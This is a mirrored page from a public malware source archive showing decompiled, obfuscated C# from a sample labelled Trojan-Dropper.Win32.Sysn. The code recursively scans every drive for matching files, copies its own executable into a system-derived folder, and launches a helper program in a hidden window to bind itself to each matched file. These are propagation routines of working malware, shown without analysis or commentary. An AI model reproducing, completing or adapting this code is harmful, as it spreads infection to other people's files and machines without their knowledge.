mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-23 03:46:10 +00:00
84 lines
2.9 KiB
C#
84 lines
2.9 KiB
C#
|
// Decompiled with JetBrains decompiler
|
|||
|
// Type: .
|
|||
|
// Assembly: AudioHD, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
|||
|
// MVID: A79492AA-5FAA-4ED2-ACC6-3D90AD665D99
|
|||
|
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan-Dropper.Win32.Sysn.awyx-36fae8d04bf5f7d873dd5aa10ad92403f80b9af8b6ef91319e70ea2c9c043024.exe
|
|||
|
|
|||
|
using \u0001;
|
|||
|
using \u000F;
|
|||
|
using System;
|
|||
|
using System.Diagnostics;
|
|||
|
using System.IO;
|
|||
|
using System.Runtime.InteropServices;
|
|||
|
using System.Text;
|
|||
|
|
|||
|
namespace \u000F
|
|||
|
{
|
|||
|
internal sealed class \u0008
|
|||
|
{
|
|||
|
[NonSerialized]
|
|||
|
internal static \u0002 \u0001;
|
|||
|
public static int \u0001;
|
|||
|
private static string \u0001;
|
|||
|
private static string \u0002;
|
|||
|
|
|||
|
[DllImport("kernel32.dll", EntryPoint = "GetShortPathName", CharSet = CharSet.Auto)]
|
|||
|
public static extern int \u000F([MarshalAs(UnmanagedType.LPTStr)] string path, [MarshalAs(UnmanagedType.LPTStr)] StringBuilder shortPath, [In] int obj2);
|
|||
|
|
|||
|
private static void \u000F([In] string obj0)
|
|||
|
{
|
|||
|
foreach (string file in Directory.GetFiles(obj0))
|
|||
|
{
|
|||
|
if (file.Contains(\u0008.\u0001(8880)))
|
|||
|
\u0008.\u0011(file);
|
|||
|
if (file.Contains(\u0008.\u0001(8889)))
|
|||
|
\u0008.\u0011(file);
|
|||
|
}
|
|||
|
foreach (string directory in Directory.GetDirectories(obj0))
|
|||
|
\u0008.\u000F(directory);
|
|||
|
}
|
|||
|
|
|||
|
public static void \u0010([In] string obj0)
|
|||
|
{
|
|||
|
\u0008.\u0002 = obj0;
|
|||
|
foreach (string logicalDrive in Environment.GetLogicalDrives())
|
|||
|
\u0008.\u000F(logicalDrive);
|
|||
|
}
|
|||
|
|
|||
|
public static void \u0011([In] string obj0)
|
|||
|
{
|
|||
|
string folderPath = Environment.GetFolderPath(Environment.SpecialFolder.System);
|
|||
|
string path1 = folderPath.Replace(folderPath.Substring(folderPath.IndexOf(\u0008.\u0001(2016))), string.Empty) + \u0008.\u0001(2016);
|
|||
|
\u0008.\u0001 = Environment.GetFolderPath(Environment.SpecialFolder.ProgramFiles) + \u0008.\u0001(8898);
|
|||
|
if (!File.Exists(\u0008.\u0001))
|
|||
|
return;
|
|||
|
if (!File.Exists(Path.Combine(path1, \u0008.\u0002)))
|
|||
|
File.Copy(Process.GetCurrentProcess().MainModule.FileName, Path.Combine(path1, \u0008.\u0002));
|
|||
|
StringBuilder shortPath1 = new StringBuilder((int) byte.MaxValue);
|
|||
|
\u0008.\u000F(Path.Combine(path1, \u0008.\u0002), shortPath1, shortPath1.Capacity);
|
|||
|
string str1 = shortPath1.ToString();
|
|||
|
StringBuilder shortPath2 = new StringBuilder((int) byte.MaxValue);
|
|||
|
\u0008.\u000F(obj0, shortPath2, shortPath2.Capacity);
|
|||
|
try
|
|||
|
{
|
|||
|
ProcessStartInfo startInfo = new ProcessStartInfo();
|
|||
|
string str2 = \u0008.\u0001(8923) + (object) shortPath2 + \u0008.\u0001(1448) + str1;
|
|||
|
startInfo.FileName = \u0008.\u0001;
|
|||
|
startInfo.Arguments = str2;
|
|||
|
startInfo.WindowStyle = ProcessWindowStyle.Hidden;
|
|||
|
Process.Start(startInfo);
|
|||
|
++\u0008.\u0001;
|
|||
|
}
|
|||
|
catch
|
|||
|
{
|
|||
|
}
|
|||
|
}
|
|||
|
|
|||
|
static \u0008()
|
|||
|
{
|
|||
|
\u0003.\u000F();
|
|||
|
\u0008.\u0001 = 0;
|
|||
|
}
|
|||
|
}
|
|||
|
}
|